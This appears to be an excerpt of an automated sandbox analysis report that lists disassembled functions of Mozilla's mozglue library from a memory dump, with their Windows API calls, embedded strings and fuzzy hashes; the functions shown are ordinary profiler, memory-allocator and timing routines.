                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F93A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F98A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F990
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F994
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F716
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                              • Part of subcall function 6CC3B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC3B5E0
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F739
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F746
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F793
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCB385B,00000002,?,?,?,?,?), ref: 6CC7F829
                                                                            • free.MOZGLUE(?,?,00000000,?), ref: 6CC7F84C
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CC7F866
                                                                            • free.MOZGLUE(?), ref: 6CC7FA0C
                                                                              • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC45E8C
                                                                              • Part of subcall function 6CC45E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45E9D
                                                                              • Part of subcall function 6CC45E60: GetCurrentThreadId.KERNEL32 ref: 6CC45EAB
                                                                              • Part of subcall function 6CC45E60: GetCurrentThreadId.KERNEL32 ref: 6CC45EB8
                                                                              • Part of subcall function 6CC45E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45ECF
                                                                              • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CC45F27
                                                                              • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CC45F47
                                                                              • Part of subcall function 6CC45E60: GetCurrentProcess.KERNEL32 ref: 6CC45F53
                                                                              • Part of subcall function 6CC45E60: GetCurrentThread.KERNEL32 ref: 6CC45F5C
                                                                              • Part of subcall function 6CC45E60: GetCurrentProcess.KERNEL32 ref: 6CC45F66
                                                                              • Part of subcall function 6CC45E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC45F7E
                                                                            • free.MOZGLUE(?), ref: 6CC7F9C5
                                                                            • free.MOZGLUE(?), ref: 6CC7F9DA
                                                                            Strings
                                                                            • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CC7F9A6
                                                                            • " attempted to re-register as ", xrefs: 6CC7F858
                                                                            • Thread , xrefs: 6CC7F789
                                                                            • [D %d/%d] profiler_register_thread(%s), xrefs: 6CC7F71F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                            • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                            • API String ID: 882766088-1834255612
                                                                            • Opcode ID: c66a9351c0306b8c0f8c4c1117e93bd22392f4005b919855b4b4c0a71354169d
                                                                            • Instruction ID: ef62768611038c41c543cf344f1f53f6099619e0f22c236f2ac275540298683b
                                                                            • Opcode Fuzzy Hash: c66a9351c0306b8c0f8c4c1117e93bd22392f4005b919855b4b4c0a71354169d
                                                                            • Instruction Fuzzy Hash: 3D8113756046009FDB21DF64C880AAEB7B5FF85308F45852DE8499BB51FB31E849CBA2
                                                                            Function 6CC44180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC44196
                                                                            • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6CC441F1
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44223
                                                                            • VerSetConditionMask.NTDLL ref: 6CC4422A
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44231
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44238
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC44245
                                                                            • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6CC44263
                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6CC4427A
                                                                            • FreeLibrary.KERNEL32(?), ref: 6CC44299
                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC442C4
                                                                            • VerSetConditionMask.NTDLL ref: 6CC442F6
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44302
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44309
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44310
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44317
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC44324
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                            • String ID: SetProcessDpiAwareness$Shcore.dll
                                                                            • API String ID: 3038791930-999387375
                                                                            • Opcode ID: 9a54b90918df0b6717ae368c4e16397bd3c35999c1caa8097a8d3e89c9a4abf2
                                                                            • Instruction ID: 8989e7832bf2b970179ef2b4b42e176b9d85b1e639f600e84a4992e028176c8b
                                                                            • Opcode Fuzzy Hash: 9a54b90918df0b6717ae368c4e16397bd3c35999c1caa8097a8d3e89c9a4abf2
                                                                            • Instruction Fuzzy Hash: C851E371B402156BEB20AFB5CC48BAA77BCEF86B14F118558F905A76C0EB74DD40CBA0
                                                                            Function 6CC7EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EE60
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EE6D
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EE92
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7EEA5
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC7EEB4
                                                                            • free.MOZGLUE(00000000), ref: 6CC7EEBB
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EEC7
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7EECF
                                                                              • Part of subcall function 6CC7DE60: GetCurrentThreadId.KERNEL32 ref: 6CC7DE73
                                                                              • Part of subcall function 6CC7DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC44A68), ref: 6CC7DE7B
                                                                              • Part of subcall function 6CC7DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC44A68), ref: 6CC7DEB8
                                                                              • Part of subcall function 6CC7DE60: free.MOZGLUE(00000000,?,6CC44A68), ref: 6CC7DEFE
                                                                              • Part of subcall function 6CC7DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC7DF38
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EF1E
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EF2B
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EF59
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EFB0
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EFBD
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EFE1
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EFF8
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F000
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F02F
                                                                              • Part of subcall function 6CC7F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7F09B
                                                                              • Part of subcall function 6CC7F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC7F0AC
                                                                              • Part of subcall function 6CC7F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC7F0BE
                                                                            Strings
                                                                            • [I %d/%d] profiler_pause, xrefs: 6CC7F008
                                                                            • [I %d/%d] profiler_stop, xrefs: 6CC7EED7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                            • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                            • API String ID: 16519850-1833026159
                                                                            • Opcode ID: 5483e2aab6c3eab869ae772fb9327020999dd2a733a07ac593c55c44745bd969
                                                                            • Instruction ID: 87cc19eaa7ff1862e149d7e13b61f96da5ddd9fa91974ee0a6cb559ff2303005
                                                                            • Opcode Fuzzy Hash: 5483e2aab6c3eab869ae772fb9327020999dd2a733a07ac593c55c44745bd969
                                                                            • Instruction Fuzzy Hash: FE51363E6002209FDB105BE9D8587AAB7B4EB47328F14052AF91583F41FB754804CBBA
                                                                            Function 6CC6D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBE804), ref: 6CC6D047
                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC6D093
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC6D0A6
                                                                            • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6CCBE810,00000040), ref: 6CC6D0D0
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE7B8,00001388), ref: 6CC6D147
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE744,00001388), ref: 6CC6D162
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE784,00001388), ref: 6CC6D18D
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE7DC,00001388), ref: 6CC6D1B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                            • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                            • API String ID: 2957312145-326518326
                                                                            • Opcode ID: 2e8aafadb6554c9b257a7ac61c0ee5870f99878bc684381d5172db8926274143
                                                                            • Instruction ID: c50c1e093bbb7c57f3f528629ea322eb351c608e084e2fffade4dd2aab1bc9e8
                                                                            • Opcode Fuzzy Hash: 2e8aafadb6554c9b257a7ac61c0ee5870f99878bc684381d5172db8926274143
                                                                            • Instruction Fuzzy Hash: 4581D170B042109BEB009FEADA94B6937B4FB46B04F2405AEE901E7F80F7759805CBD9
                                                                            Function 6CC7FAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7FADC
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7FAE9
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7FB31
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7FB43
                                                                            • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC7FBF6
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7FC50
                                                                            Strings
                                                                            • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6CC7FD15
                                                                            • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6CC7FC94
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                            • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                                            • API String ID: 2101194506-3679350629
                                                                            • Opcode ID: c67b009fcc7ef0ca7a60793078063a90ac4d6967bea74b28e87266df6164a36f
                                                                            • Instruction ID: f0f123e6eaaf4642fa327aac64b96fc3142f8f51e3346d77a6f10b3431b504db
                                                                            • Opcode Fuzzy Hash: c67b009fcc7ef0ca7a60793078063a90ac4d6967bea74b28e87266df6164a36f
                                                                            • Instruction Fuzzy Hash: B371F075A04700CFD720DF69C494B6AB7F1FF8A348F11856AE84587B61FB30A805CBA6
                                                                            Function 6CC45E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45E9D
                                                                              • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                              • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                              • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                              • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC45EAB
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC45EB8
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45ECF
                                                                            • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CC46017
                                                                              • Part of subcall function 6CC34310: moz_xmalloc.MOZGLUE(00000010,?,6CC342D2), ref: 6CC3436A
                                                                              • Part of subcall function 6CC34310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC342D2), ref: 6CC34387
                                                                            • moz_xmalloc.MOZGLUE(00000004), ref: 6CC45F47
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC45F53
                                                                            • GetCurrentThread.KERNEL32 ref: 6CC45F5C
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC45F66
                                                                            • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC45F7E
                                                                            • moz_xmalloc.MOZGLUE(00000024), ref: 6CC45F27
                                                                              • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                            • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC45E8C
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC4605D
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC460CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                            • String ID: GeckoMain
                                                                            • API String ID: 3711609982-966795396
                                                                            • Opcode ID: 17fa1146c72fb257d794f7379d2c5853f9092ce3f40034b6055d3b60330c6798
                                                                            • Instruction ID: 6814ab0d17035f7502bb5e2369cd3f8a2c49e669ea72b582e3892990ab10bded
                                                                            • Opcode Fuzzy Hash: 17fa1146c72fb257d794f7379d2c5853f9092ce3f40034b6055d3b60330c6798
                                                                            • Instruction Fuzzy Hash: C571E4B46057409FD700DF69C4C0A6ABBF0FF49304F54896DE48687B52EB31E849CB96
                                                                            Function 6CC49590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC331C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC33217
                                                                              • Part of subcall function 6CC331C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC33236
                                                                              • Part of subcall function 6CC331C0: FreeLibrary.KERNEL32 ref: 6CC3324B
                                                                              • Part of subcall function 6CC331C0: __Init_thread_footer.LIBCMT ref: 6CC33260
                                                                              • Part of subcall function 6CC331C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC3327F
                                                                              • Part of subcall function 6CC331C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3328E
                                                                              • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332AB
                                                                              • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332D1
                                                                              • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC332E5
                                                                              • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC332F7
                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC49675
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC49697
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC496E8
                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC49707
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4971F
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49773
                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC497B7
                                                                            • FreeLibrary.KERNEL32 ref: 6CC497D0
                                                                            • FreeLibrary.KERNEL32 ref: 6CC497EB
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49824
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                            • API String ID: 3361784254-3880535382
                                                                            • Opcode ID: 601137733288f0fa58f6143d9ae7cfdac585fd86eaf83e346e16b5998d57d83c
                                                                            • Instruction ID: 3f3e73885fe08f87aa6b912e3173862560fb48af3337b011478d0ee50b2c5c42
                                                                            • Opcode Fuzzy Hash: 601137733288f0fa58f6143d9ae7cfdac585fd86eaf83e346e16b5998d57d83c
                                                                            • Instruction Fuzzy Hash: D261F3796002119FDF00CFE9DA88B9A3BB8EB4A314F10C569F915A3B80E730E944CB95
                                                                            Function 6CC33AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE768,?,00003000,00000004), ref: 6CC33AC5
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE768,?,00003000,00000004), ref: 6CC33AE5
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6CC33AFB
                                                                            • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC33B57
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC33B81
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC33BA3
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7B8), ref: 6CC33BAE
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7B8), ref: 6CC33C74
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC33C8B
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC33C9F
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7B8), ref: 6CC33D5C
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC33D67
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC33D8A
                                                                              • Part of subcall function 6CC70D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC33DEF), ref: 6CC70D71
                                                                              • Part of subcall function 6CC70D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC33DEF), ref: 6CC70D84
                                                                            Strings
                                                                            Memory Dump Source
